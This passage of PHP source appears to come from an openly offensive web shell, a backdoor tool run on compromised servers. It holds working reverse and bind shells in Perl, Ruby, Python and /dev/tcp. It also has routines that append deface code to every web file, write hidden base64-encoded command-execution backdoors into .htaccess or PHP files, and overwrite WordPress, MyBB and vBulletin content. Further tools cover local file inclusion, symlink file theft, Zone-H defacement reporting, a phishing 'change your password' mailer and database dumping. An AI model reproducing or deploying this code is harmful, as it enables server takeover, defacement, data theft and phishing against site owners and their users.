  764. \$SIG{CHLD} = 'IGNORE';
  765. use Socket;
  766. socket(S, PF_INET, SOCK_STREAM, 0);
  767. setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
  768. bind(S, sockaddr_in(\$port, INADDR_ANY));
  769. listen(S, 50);
  770. while(1)
  771. {
  772.    accept(X, S);
  773.    unless(fork)
  774.    {
  775.        open STDIN, \"<&X\";
  776.        open STDOUT, \">&X\";
  777.        open STDERR, \">&X\";
  778.        close X;
  779.        exec(\"/bin/sh\");
  780.    }
  781.    close X;
  782. }
  783. ";
  784. $fp = fopen("bind.pl", "w");
  785. fwrite($fp, $bind);
  786. fclose($fp);
  787. exec("perl bind.pl");
  788. }
  789.  
  790.  
  791. if(isset($_POST['rbip'])){
  792.     $ip = $_POST['rbip'];
  793.     $port = $_POST['rbport'];
  794. $ruby = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'";
  795. $fp = fopen("bind.rb", "w");
  796. fwrite($fp, $ruby);
  797. fclose($fp);
  798. exec("ruby bind.rb");
  799. }
  800.  
  801. if(isset($_POST['rbipw'])){
  802.     $ip = $_POST['rbipw'];
  803.     $port = $_POST['rbportw'];
  804. $ruby = "ruby -rsocket -e 'c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'";
  805. $fp = fopen("bind_win.rb", "w");
  806. fwrite($fp, $ruby);
  807. fclose($fp);
  808. exec("ruby bind_win.rb");
  809. }
  810.  
  811. if(isset($_POST['pyip'])){
  812.     $ip = $_POST['pyip'];
  813.     $port = $_POST['pyport'];
  814. $bind = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"".$ip."\",".$port."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'";
  815.  
  816. $fp = fopen("bind.py", "w");
  817. fwrite($fp, $bind);
  818. fclose($fp);
  819. exec("python bind.py");
  820. }
  821.  
  822. if(isset($_POST['ip']) && !empty($_POST['theport'])) {
  823. $ip = $_POST['ip'];
  824. $port = $_POST['theport'];
  825.  
  826. if(function_exists('exec')){
  827. echo 'Exec command not blocked,,,, continuing';
  828. exec('0<&196;exec 196<>/dev/tcp/.$ip./.$port.; sh <&196 >&196 2>&196');
  829. }
  830. else{
  831. echo 'Exec command is blocked blocked by admin';
  832. }
  833.  
  834. }
  835. }
  836. echo '</center>';
  837. }
  838.  
  839. if(isset($_GET['action']) && $_GET['action'] == 'proc'){
  840. ?>
  841. <textarea style="width:100%;height:100%;border:0;outline:none;margin:0;padding:0;color: #333333;font-family: Tahoma, Geneva, sans-serif;font-size:12px;background:black;margin-left:30px;">
  842. <?php
  843. echo shell_exec("tasklist")."<br>";
  844. ?>
  845. </textarea>
  846. <?php
  847. }
  848.  
  849. if(isset($_GET['action']) && $_GET['action'] == 'mass'){
  850.     if(!isset($_GET['code'])){
  851.  
  852. ?>
  853.  
  854. <?php
  855. echo '<form action="" method="get">
  856. <center>Mass deface script, php/html/htm/asp/aspx/js</center><input type="hidden" name="action" value="mass">
  857. <textarea name="code" id="source">YOUR DEFACE PAGE HERE =)</textarea><br>
  858. <center><font color="#333333">Folder:</font> <input type="text" value="'.getcwd().'" name="dir" style="border-top:none;"><br><input type="submit" value="Ex3cut3" style="border-top:none;"></center>
  859. </form>';
  860. }
  861. else{
  862.  
  863.     if (is_dir($_GET['dir'])) {
  864.         $lolinject = $_GET['code'];
  865.         foreach (glob($_GET['dir']."/*.php") as $injectj00) {
  866.             $fp=fopen($injectj00,"a+");
  867.             if (fputs($fp,$lolinject)){
  868.                 echo $injectj00.' was injected<br>';
  869.             } else {
  870.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  871.             }
  872.         }
  873.         foreach (glob($_GET['dir']."/*.html") as $injectj00) {
  874.             $fp=fopen($injectj00,"a+");
  875.             if (fputs($fp,$lolinject)){
  876.                 echo $injectj00.' was injected<br>';
  877.             } else {
  878.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  879.             }
  880.         }
  881.         foreach (glob($_GET['dir']."/*.htm") as $injectj00) {
  882.             $fp=fopen($injectj00,"a+");
  883.             if (fputs($fp,$lolinject)){
  884.                 echo $injectj00.' was injected<br>';
  885.             } else {
  886.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  887.             }
  888.         }
  889.         foreach (glob($_GET['dir']."/*.asp") as $injectj00) {
  890.             $fp=fopen($injectj00,"a+");
  891.             if (fputs($fp,$lolinject)){
  892.                 echo $injectj00.' was injected<br>';
  893.             } else {
  894.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  895.             }
  896.         }
  897.         foreach (glob($_GET['dir']."/*.js") as $injectj00) {
  898.             $fp=fopen($injectj00,"a+");
  899.             if (fputs($fp,$lolinject)){
  900.                 echo $injectj00.' was injected<br>';
  901.             } else {
  902.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  903.             }
  904.         }
  905.         foreach (glob($_GET['dir']."/*.aspx") as $injectj00) {
  906.             $fp=fopen($injectj00,"a+");
  907.             if (fputs($fp,$lolinject)){
  908.                 echo $injectj00.' was injected<br>';
  909.             } else {
  910.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  911.             }
  912.         }
  913.     } else { //end if inputted dir is real -- if not, show an ugly red error
  914.         echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>';
  915.     } // end if inputted dir is real, for real this time
  916. }
  917.  
  918. }
  919.  
  920. if(isset($_GET['action']) && $_GET['action'] == 'encoders'){
  921. ?>
  922. <div id="commands"><center>
  923. <h2>Enc0d3 ~ D3c0d3</h2>
  924. <form action="" method="post">
  925. <textarea style="color: #00ff00;background-color:#002d00;" name="code">code here</textarea><br>
  926. <select name="encoded">
  927. <option>Base64_encode</option>
  928. <option>Base64_decode</option>
  929. <option>Urlencode</option>
  930. <option>Urldecode</option>
  931. <option>Hash_md5</option>
  932. <option>Hash_sha1</option>
  933. <option>Hash_sha512</option>
  934. </select><br>
  935. <input type="submit" value="Ex3cut3">
  936. </form>
  937. </center></div>
  938. <hr>
  939. <textarea id="source">
  940. <?php
  941. if(isset($_GET['action']) && $_GET['action'] == 'encoders' && !empty($_POST['code']) && !empty($_POST['encoded'])){
  942. $format = $_POST['encoded'];
  943. $code = $_POST['code'];
  944.  
  945. if($format == 'Base64_encode'){
  946. echo base64_encode($code);
  947. }
  948. if($format == 'Base64_decode'){
  949. echo base64_decode($code);
  950. }
  951. if($format == 'Urlencode'){
  952. echo urlencode($code);
  953. }
  954. if($format == 'Urldecode'){
  955. echo urldecode($code);
  956. }
  957. if($format == 'Hash_md5'){
  958. echo md5($code);
  959. }
  960. if($format == 'Hash_sha1'){
  961. echo sha1($code);
  962. }
  963. if($format == 'Hash_sha512'){
  964. echo hash('sha512', $code);
  965. }
  966.  
  967. }
  968. ?>
  969. </textarea>
  970.  
  971. <?php
  972. }
  973.  
  974. if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 1){
  975.  
  976. ?>
  977. <div style="color:#333333">
  978. <form action="?action=mysql&main=2" method="post">
  979. host <input type="text" name="host" value="localhost"><br>
  980. user <input type="text" name="user" value="root"><br>
  981. pass <input type="text" name="pass"><br>
  982. <input type="submit" value="Ex3cut3">
  983. </form></div>
  984. <?php
  985. }
  986.  
  987. if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 2){
  988. $host = $_POST['host'];
  989. $user = $_POST['user'];
  990. $pass = $_POST['pass'];
  991. mysql_connect($host, $user, $pass) or die('Not connected!');
  992.  
  993. $query = mysql_query('SHOW DATABASES');
  994.  
  995. echo '<div style="color:#333333"><center><h2>Database</h2><form action="" method="get"><select name="db">';
  996.                         while($rows=mysql_fetch_array($query)){
  997.                             for($j=0;$j<mysql_num_fields($query);$j++)
  998.                             {
  999.  
  1000.                                 if($rows[$j] == "") $dataz = " ";
  1001.                                 else $dataz = $rows[$j];
  1002.                                 $result .= '<option>'.htmlspecialchars($dataz).'</option>';
  1003.                             }
  1004.                         }
  1005. echo $result;  
  1006. echo '</select><br><input type="hidden" value="'.$host.'" name="host"><input type="hidden" value="'.$user.'" name="user"><input type="hidden" value="'.$pass.'" name="pass"><input type="hidden" value="3" name="main"><input type="submit" value="Ex3cut3"></form></center></div>';
  1007. mysql_close();
  1008. }
  1009.  
  1010. if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 3){
  1011. $host = $_GET['host'];
  1012. $user = $_GET['user'];
  1013. $pass = $_GET['pass'];
  1014. mysql_connect($host, $user, $pass) or die('Not connected!');
  1015.  
  1016.  
  1017. $db = $_GET['db'];
  1018. $sql = "SHOW TABLES FROM ".$db;
  1019. $result = mysql_query($sql);
  1020. while ($row = mysql_fetch_row($result)) {
  1021.     echo '<a href="?action=mysql&main=4&db='.$db.'&host='.$host.'&user='.$user.'&pass='.$pass.'&table='.$row[0].'" id="table">&nbsp;&nbsp;'.$row[0].'&nbsp;&nbsp;</a>';
  1022. }
  1023. mysql_free_result($result);
  1024.  
  1025. mysql_close();
  1026. }
  1027.  
  1028. if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 4 && empty($_GET['column']) && !empty($_GET['table'])){
  1029. $host = $_GET['host'];
  1030. $user = $_GET['user'];
  1031. $pass = $_GET['pass'];
  1032. mysql_connect($host, $user, $pass) or die('Not connected!');
  1033. mysql_select_db($_GET['db']) or die('Unable to select db');
  1034.  
  1035. $query = mysql_query("SHOW COLUMNS FROM ".$_GET['table']);
  1036. while ($row = mysql_fetch_row($query)) {
  1037.     echo '<a href="?action=mysql&main=5&db='.$_GET['db'].'&host='.$host.'&user='.$user.'&pass='.$pass.'&table='.$_GET['table'].'&column='.$row[0].'" id="table">&nbsp;&nbsp;'.$row[0].'&nbsp;&nbsp;</a>';
  1038. }
  1039. mysql_free_result($query);
  1040. mysql_close();
  1041. }
  1042.  
  1043. if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 5 && !empty($_GET['column'])){
  1044. $host = $_GET['host'];
  1045. $user = $_GET['user'];
  1046. $pass = $_GET['pass'];
  1047. mysql_connect($host, $user, $pass) or die('Not connected!');
  1048. mysql_select_db($_GET['db']) or die('Unable to select db');
  1049.  
  1050. $query = mysql_query("SELECT ".$_GET['column']." FROM ".$_GET['table']);
  1051. echo "<textarea id=\"table\" style=\"width:100%;height:100%\">";
  1052. while($row = mysql_fetch_array($query)){
  1053. echo htmlspecialchars($row[$_GET['column']])."\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n";
  1054. }
  1055. echo "</textarea><br><br>   ";
  1056. }
  1057.  
  1058. // tools
  1059. if(isset($_GET['action']) && $_GET['action'] == 'zone-h' && !empty($_POST['hackmode'])){
  1060. if($_POST['SendNowToZoneH'])
  1061. {
  1062.     echo '<center>';
  1063.     ob_start();
  1064.     $sub = get_loaded_extensions();
  1065.     if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');}
  1066.     $hacker = $_POST['defacer'];
  1067.     $method = $_POST['hackmode'];
  1068.     $neden = $_POST['reason'];
  1069.     $site = $_POST['domain'];
  1070.    
  1071.     if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}
  1072.     elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}
  1073.     elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}
  1074.     elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}
  1075.     $i = 0;
  1076.     $sites = explode("\n", $site);
  1077.     while($i < count($sites))
  1078.     {
  1079.         if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
  1080.         ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  1081.         echo "Site : ".$sites[$i]." Defaced !\n";
  1082.         ++$i;
  1083.     }
  1084.     echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
  1085. }
  1086.     echo '</center>';
  1087. }
  1088.  
  1089. if(isset($_GET['action']) && $_GET['action'] == 'zone-h'){
  1090. ?>
  1091. <center>
  1092. <!-- Zone-H -->
  1093. <form action="" method='POST'><table><tr>
  1094. <td style='background-color:#666;padding-left:10px;'><h2 style="color:#00cc00"><center>Zone-H Defacer</center></h2></td></tr><tr><td height='45' colspan='2'><form method="post">
  1095. <input type="text" name="defacer" value="d3f4c3r_n4m3" />
  1096. <select name="hackmode">
  1097. <option >--------SELECT--------</option>
  1098. <option value="1">known vulnerability (i.e. unpatched system)</option>
  1099. <option value="2" >undisclosed (new) vulnerability</option>
  1100. <option value="3" >configuration / admin. mistake</option>
  1101. <option value="4" >brute force attack</option>
  1102. <option value="5" >social engineering</option>
  1103. <option value="6" >Web Server intrusion</option>
  1104. <option value="7" >Web Server external module intrusion</option>
  1105. <option value="8" >Mail Server intrusion</option>
  1106. <option value="9" >FTP Server intrusion</option>
  1107. <option value="10" >SSH Server intrusion</option>
  1108. <option value="11" >Telnet Server intrusion</option>
  1109. <option value="12" >RPC Server intrusion</option>
  1110. <option value="13" >Shares misconfiguration</option>
  1111. <option value="14" >Other Server intrusion</option>
  1112. <option value="15" >SQL Injection</option>
  1113. <option value="16" >URL Poisoning</option>
  1114. <option value="17" >File Inclusion</option>
  1115. <option value="18" >Other Web Application bug</option>
  1116. <option value="19" >Remote administrative panel access bruteforcing</option>
  1117. <option value="20" >Remote administrative panel access password guessing</option>
  1118. <option value="21" >Remote administrative panel access social engineering</option>
  1119. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  1120. <option value="23" >Access credentials through Man In the Middle attack</option>
  1121. <option value="24" >Remote service password guessing</option>
  1122. <option value="25" >Remote service password bruteforce</option>
  1123. <option value="26" >Rerouting after attacking the Firewall</option>
  1124. <option value="27" >Rerouting after attacking the Router</option>
  1125. <option value="28" >DNS attack through social engineering</option>
  1126. <option value="29" >DNS attack through cache poisoning</option>
  1127. <option value="30" >Not available</option>
  1128. </select>
  1129.  
  1130. <select name="reason">
  1131. <option >--------SELECT--------</option>
  1132. <option value="1" >Heh...just for fun!</option>
  1133. <option value="2" >Revenge against that website</option>
  1134. <option value="3" >Political reasons</option>
  1135. <option value="4" >As a challenge</option>
  1136. <option value="5" >I just want to be the best defacer</option>
  1137. <option value="6" >Patriotism</option>
  1138. <option value="7" >Not available</option>
  1139. </select>
  1140. <input type="hidden" name="action" value="zone-h">
  1141. <center><textarea style="background:green;outline:none;" name="domain" cols="44" rows="9" id="domains">List Of Domains</textarea>
  1142. <br /><input type="submit" value="Send Now !" name="SendNowToZoneH" /></center>
  1143. </form></td></tr></table></form>
  1144. <!-- End Of Zone-H -->
  1145. </td></center>
  1146. <?php
  1147. }
  1148.  
  1149. if(isset($_GET['action']) && $_GET['action'] == 'tools'){
  1150. ?>
  1151. <div id="commands">
  1152. <div style="float:right">
  1153. <center>
  1154. <h2>Cloudflare</h2>
  1155. Ip finder ./x-h4ck
  1156. <form action="" method="post">
  1157. <input type="text" value="exploit-db.com" name="site"><input type="submit" name="submit" value="Ex3cut3">
  1158. </form>
  1159. <h2>CMS Fack</h2>
  1160. <span style="font-family:arial;font-size:10px;color:white">wp/mybb/vb<br>
  1161. <form action="" method="post">
  1162. <textarea name="index" style="width:220px;height:100px;color: #00ff00;background-color:#002d00;">Some deface shit in here :P</textarea><br>
  1163. <input type="text" value="host" name="host" style="border-bottom:none"><br><input type="text" name="user" value="user" style="border-bottom:none"><br><input type="text" name="pass" value="pass" style="border-bottom:none"><br><input type="text" name="db" value="database" style="border-bottom:none"><br><input type="text" name="tab" value="table prefix"><br>
  1164. <input type="radio" name="cat" value="wp">wp<input type="radio" name="cat" value="mybb">mybb<input type="radio" name="cat" value="vb">vb<br>
  1165. <span style="font-family:arial;font-size:10px;color:white">vb = update faq, calendar, search<br />wp = update wordpress posts<br>mybb = update mybb index<br>
  1166. <input type="submit" value="Ex3cut3">
  1167. </form><br />
  1168. <?php
  1169. if(isset($_GET['folder'])){
  1170. $chemin=$_GET['folder'];
  1171.  
  1172. $files = glob("$chemin*");
  1173.  
  1174. echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
  1175.  
  1176. foreach ($files as $filename) {
  1177.  
  1178.     echo "<pre>";
  1179.  
  1180.    echo "$filename\n";
  1181.  
  1182.    echo "</pre>";
  1183.  
  1184. }
  1185. }
  1186. else{ ?>
  1187. <h2 style="color:#00cc00;font-size:21px">List Directory</h2>
  1188. <form action="" method="get">
  1189. <input type="text" name="folder" value="/etc/passwd/">
  1190. <input type="submit" value="Ex3cut3">
  1191. <input type="hidden" name="action" value="tools">
  1192. </form>
  1193. <?php }
  1194. if(isset($_GET['hex'])){
  1195. echo '<br /><br /><font color="#00ff00"><b>0x'.bin2hex($_GET['hex']).'</b></font>';
  1196. }
  1197. else{ ?>
  1198. <h2 style="color:#00cc00;font-size:21px">Text 2 Hex</h2>
  1199. <form action="" method="get">
  1200. <input type="text" name="hex" value="abcd">
  1201. <input type="submit" value="Ex3cut3">
  1202. <input type="hidden" name="action" value="tools">
  1203. </form>
  1204. <?php }
  1205. ?>
  1206. <?php
  1207. if(isset($_GET['lfi'])){
  1208. include($_GET['lfi']);
  1209. }
  1210. else{ ?>
  1211. <h2 style="color:#00cc00;font-size:21px">LFI Dude</h2>
  1212. <form action="" method="get">
  1213. <input type="text" name="lfi" value="../../../../../proc/sef/environ">
  1214. <input type="submit" value="Ex3cut3">
  1215. <input type="hidden" name="action" value="tools">
  1216. </form>
  1217. <?php }
  1218. ?>
  1219. </center>
  1220. </div>
  1221. <div>
  1222. <h2>Mail sender</h2>
  1223. <form action="" method="post">
  1224. <font color="#333333"><b>Subject:</b></font><br><input type="text" name="subjekti" value="change your password"><br>
  1225. <font color="#333333"><b>From:<br></font><input type="text" name="email" value="[email protected]"><br>
  1226. <font color="#333333"><b>To:<br></font><input type="text" name="to" value="@"><br>
  1227. <font color="#333333"><b>Body:<br></font><textarea style="width:220px;height:100px;color: #00ff00;background-color:#002d00;" name="arsyeja">We made some changes recent days and..</textarea><br>
  1228. <font color="#333333"><b>Times:<br></font><input type="text" name="times" value="1" style="width:30px">
  1229. <input type="submit" name="submit" value="send spam">
  1230. </form>
  1231. </div>
  1232. <?php
  1233. if(isset($_GET['cook'])){
  1234. $a = fopen("oncha.php", "w");
  1235. fputs($a, $o);
  1236. fclose($a);
  1237. }
  1238.  
  1239. if(isset($_GET['s-option'])){
  1240. $op = $_GET['s-option'];
  1241. if($op == ".htaccess"){
  1242. $o = stripslashes(base64_decode("IyBPdmVycmlkZSBkZWZhdWx0IGRlbnkgcnVsZSB0byBtYWtlIC5odGFjY2VzcyBmaWxlIGFjY2Vzc2libGUgb3ZlciB3ZWINCjxGaWxlcyB+IFwiXlxcLmh0XCI+DQpPcmRlciBhbGxvdyxkZW55DQpBbGxvdyBmcm9tIGFsbA0KPC9GaWxlcz4NCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1waHAgLmh0YWNjZXNzDQoNCiMjIyMjIyBTSEVMTCAjIyMjIyMgPD9waHAgZWNobyBcIlxcblwiO3Bhc3N0aHJ1KCRfR0VUW1wnY1wnXS5cIiAyPiYxXCIpOyA/PiMjIyMjIyBMTEVIUyAjIyMjIyM="));
  1243. $a = fopen(".htaccess", "w");
  1244. fputs($a, $o);
  1245. fclose($a);
  1246. echo 'Visit <a href="http://'.$_SERVER['HTTP_HOST'].'/.htaccess?c=">'.$_SERVER['HTTP_HOST'].'/.htaccess?c=</a>';
  1247. }
  1248. else{
  1249. $o = stripslashes(base64_decode("PD9waHAgc3lzdGVtKCRfR0VUW1wnY1wnXSk7ID8+"));
  1250. $a = fopen("dfgdfg.php", "w");
  1251. fputs($a, $o);
  1252. fclose($a);
  1253. echo 'Visit <a href="'.$_SERVER['HTTP_HOST'].'/dfgdfg.php?c=">'.$_SERVER['HTTP_HOST'].'/dfgdfg.php?c=</a>';
  1254. }
  1255. }
  1256. else{ ?>
  1257. <div>
  1258. <form action="" method="get">
  1259. <h2>Hide Shell</h2>
  1260. <select name="s-option">
  1261. <option>.htaccess</option>
  1262. <option>.php</option>
  1263. </select>
  1264. <input type="hidden" name="action" value="tools">
  1265. <input type="submit" value="Ex3cut3">
  1266. </form>
  1267. </div>
  1268. <?php }
  1269. if(isset($_GET['fp'])){
  1270. $filepath = $_GET['fp'];
  1271. $sitepath = $_GET['sp'];
  1272. $writeblefilepath = 'myfile.txt';
  1273. $flib=$sitepath.$writeblefilepath;
  1274. @unlink($flib);
  1275. symlink($filepath, $flib);
  1276. echo readlink($flib)."\n";
  1277. echo "<textarea cols=30 rows=10>".file_get_contents("http://".$_SERVER['HTTP_HOST']."/".$writeblefilepath)."</textarea>";
  1278. @unlink($flib);
  1279. }
  1280. else{ ?>
  1281. <div>
  1282. <h2>Symlink #2</h2>
  1283. <a href="?action=symlink">__First tool</a><br />
  1284. File path:<br />
  1285. <form action="" method="get">
  1286. <input type="text" name="fp" value="/home/xx/public_html/xx.xx"><br />
  1287. Site path:<br />
  1288. <input type="text" name="sp" value="/home/xx/public_html/"><br />
  1289. <input type="hidden" name="action" value="tools">
  1290. <input type="submit" value="Ex3cut3" style="border-top:0"><br />
  1291. </form>
  1292. </div>
  1293. <?php } ?>
  1294.  
  1295. </div>
  1296. <textarea id="source">
  1297. <?php
  1298. if(isset($_POST['site'])){
  1299. /* FAK CLOUDFLARE, pirate.al, flashcrew.in, devilzc0de.org h4x0rs.net  */
  1300. $fuckcloud = dns_get_record($_POST['site'], DNS_TXT);
  1301. print_r($fuckcloud);
  1302.  
  1303. }
  1304.  
  1305. if(isset($_POST['subjekti'])){
  1306.  
  1307. $subject = $_POST['subjekti'];
  1308. $email = $_POST['email'];
  1309. $to = $_POST['to'];
  1310. $comments = $_POST['arsyeja'];
  1311. $times = $_POST['times'];
  1312. for($i=0;$i<$times;$i++){
  1313. if(mail("$to", "$subject", "$comments", "From: $email")){
  1314.     echo "  Sent.";
  1315. }
  1316. else{
  1317. echo "  Not sent!";
  1318. }}}
  1319.  
  1320. if(isset($_POST['index'])){
  1321. $index = mysql_real_escape_string($_POST['index']);
  1322. $host = $_POST['host'];
  1323. $user = $_POST['user'];
  1324. $pass = $_POST['pass'];
  1325. $db = $_POST['db'];
  1326. $tab = $_POST['tab'];
  1327.  
  1328. mysql_connect($host, $user, $pass);
  1329. mysql_select_db($db);
  1330.  
  1331. $cat = $_POST['cat'];
  1332. if($cat == 'wp'){
  1333. mysql_query("UPDATE ".$tab."posts SET post_title='".$index."'");
  1334. echo 'All posts updated :)';
  1335. }
  1336. if($cat == 'mybb'){
  1337. mysql_query("UPDATE ".$tab."templates SET template='".$index."'");
  1338. echo 'Index f@cked :)';
  1339. }
  1340. if($cat == 'vb'){
  1341. mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='faq'");
  1342. echo 'faq f@cked :)';
  1343. mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='calendar'");
  1344. echo 'calendar f@cked :)';
  1345. mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='search'");
  1346. echo 'search f@cked :)';
  1347. }
  1348.  
  1349. }
  1350.  
  1351. echo '</textarea>';
  1352. }
  1353. ?>
  1354. <?php
  1355.  
  1356. if(isset($_GET['action']) && $_GET['action'] == 'files'){
  1357. ?>
  1358. <div id="box"><br>
  1359.  
  1360. <form action="" method="get">
  1361. <font color="#333333"><b>&nbsp;&nbsp;&nbsp;&nbsp;Change directory</b></font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" value="<?php if(empty($_GET['go'])){echo getcwd();}else{echo $_GET['go'];} ?>" name="go">
  1362. <input type="hidden" name="action" value="files">
  1363. <input type="submit" value="Ex3cut3">
  1364. </form><br>
  1365. <form action="" method="get">
  1366. <font color="#333333"><b>&nbsp;&nbsp;&nbsp;&nbsp;Make directory</b></font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" value="name" name="newdir">
  1367. <input type="hidden" name="go" value="<?php echo getcwd(); ?>">
  1368. <input type="hidden" name="action" value="files">
  1369. <input type="submit" value="Ex3cut3">
  1370. </form><br>
  1371. <?php
  1372. // delete
  1373. if(isset($_GET['delete']) && !empty($_GET['action']) && $_GET['action'] == 'files'){
  1374. $file = $_GET['delete'];
  1375. // if exist
  1376. if(is_dir($file) || file_exists($file)){
  1377. // if file del
  1378. if(!is_dir($file)){
  1379. unlink($file);
  1380. echo '<font color="green">File deleted</font><br>';
  1381. }
  1382. if(is_dir($file)){
  1383. function rmdirs($d) {
  1384.     $f = glob($d . '*', GLOB_MARK);
  1385.     foreach($f as $z){
  1386.         if(is_dir($z)) rmdirs($z);
  1387.         else unlink($z);
  1388.     }
  1389.     if(is_dir($d)) rmdir($d);
  1390. }
  1391. rmdirs($file);
  1392. echo '<font color="green">Folder deleted</font><br>';
  1393. }
  1394.  
  1395. }
  1396. else{
  1397. echo '<font color="red">File or folder does not exist</font><br>';
  1398. }
  1399.  
  1400. }
  1401.  
  1402. // rename
  1403. if(isset($_GET['old_name']) && !empty($_GET['rename_file']) && !empty($_GET['action']) && $_GET['action'] == 'files'){
  1404. $old = $_GET['old_name'];
  1405. $new = $_GET['rename_file'];
  1406. // if new file or folder exist
  1407. if(is_dir($new) || file_exists($new)){
  1408. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">File or folder exists.</font> <a href="?delete='.$new.'&action=files">delete</a><br>';
  1409. }
  1410. else{
  1411. // if file or folder exist
  1412. if(is_dir($old) || file_exists($old)){
  1413. if(rename($old, $new)){
  1414. if(is_dir($old)){
  1415. echo "<font color=\"green\">Folder renamed sucsessfuly to ".$new."</font>, <a href=\"?view=".$new."\">open</a><br>";
  1416. }
  1417. if(!is_dir($old)){
  1418. echo "<font color=\"green\">File renamed sucsessfuly to ".$new."</font>, <a href=\"?view=".$new."\">open</a><br>";
  1419. }
  1420. }
  1421. else{
  1422. echo "<font color=\"red\">Problem renaming ".$old."</font><br>";
  1423. }
  1424. }
  1425. else{
  1426. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">File or folder not found.</font><br>';
  1427. }
  1428. }
  1429.  
  1430. }
  1431.  
  1432. if(isset($_GET['rename']) && !empty($_GET['action']) && $_GET['action'] == 'files'){
  1433. $file = $_GET['rename'];
  1434. ?>
  1435. <form action="" method="get">
  1436. Old Name: <input name="old_name" type="text" value="<?php echo $file; ?>"><br>
  1437. Rename to: <input name="rename_file" type="text" value="<?php echo $file; ?>"><br>
  1438. <input type="hidden" name="action" value="files">
  1439. <input type="submit" value="Ex3cut3">
  1440. </form>
  1441. <?php
  1442. }
  1443. // new dir
  1444. if(isset($_GET['go']) && !empty($_GET['newdir']) && !empty($_GET['action']) && $_GET['action'] == 'files'){
  1445. $dir = $_GET['go'];
  1446. $new = $_GET['newdir'];
  1447. $currect = getcwd();
  1448. // if dir is dir
  1449. if(is_dir($dir)){
  1450. // if dir exist
  1451. if(is_dir($new)){
  1452. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">Directory exist.</font> <a href="?del_dir='.$currect.'\\'.$new.'&action=files">delete</a><br>';
  1453. }
  1454. else{
  1455. if(mkdir($new)){
  1456. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="green">Directory created</font><br>';
  1457. }
  1458. else{
  1459. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">Problem creating directory</font><br>';
  1460. }
  1461. if(!is_dir($dir)){
  1462. chdir($go);
  1463. if(mkdir($new)){
  1464. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="green">Directory created</font><br>';
  1465. }
  1466. else{
  1467. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">Problem creating directory</font><br>';
  1468. }
  1469. }
  1470.  
  1471. }
  1472. }
  1473. }
  1474.  
  1475. // file browser
  1476. $self = $_SERVER['PHP_SELF'];
  1477. $dir = getcwd();
  1478.     if(isset($_GET['go']))
  1479.     {
  1480.         $dir = $_GET['go'];
  1481.     }
  1482.    
  1483.     if(is_dir($dir))
  1484.     {
  1485.         $handle = opendir($dir);
  1486.         {
  1487.        
  1488.                 showDrives();
  1489.                 ?>
  1490.                 <br>
  1491.                 &nbsp;&nbsp;&nbsp;&nbsp;&#171;<a style="color:red" href="<?php echo $_SERVER['PHP_SELF'].'?action=files&go='.getcwd(); ?>/../">back</a>&nbsp;&nbsp;&nbsp;&nbsp;
  1492.                 <a style="color:red" href="<?php echo $_SERVER['HTTP_REFERER']; ?>">&nbsp;&nbsp;&nbsp;&nbsp;forward</a>&nbsp;&nbsp;&#187;<br>
  1493.                 <?php
  1494.         if($dir[(strlen($dir)-1)] != '/'){$dir = $dir.'/';}
  1495.         while (($file = readdir($handle)) != false) {
  1496.                 if ($file != "." && $file != "..")
  1497.             {
  1498.        
  1499.         $color = 'red';
  1500.         if(is_readable($dir.$file))
  1501.         {
  1502.             $color = 'yellow';
  1503.         }
  1504.         if(is_writable($dir.$file))
  1505.         {
  1506.             $color = '#00ff00';
  1507.         }
  1508.                 if(is_dir($dir.$file))
  1509.                 {
  1510.                     ?>
  1511.                     <span id="onmouseover">
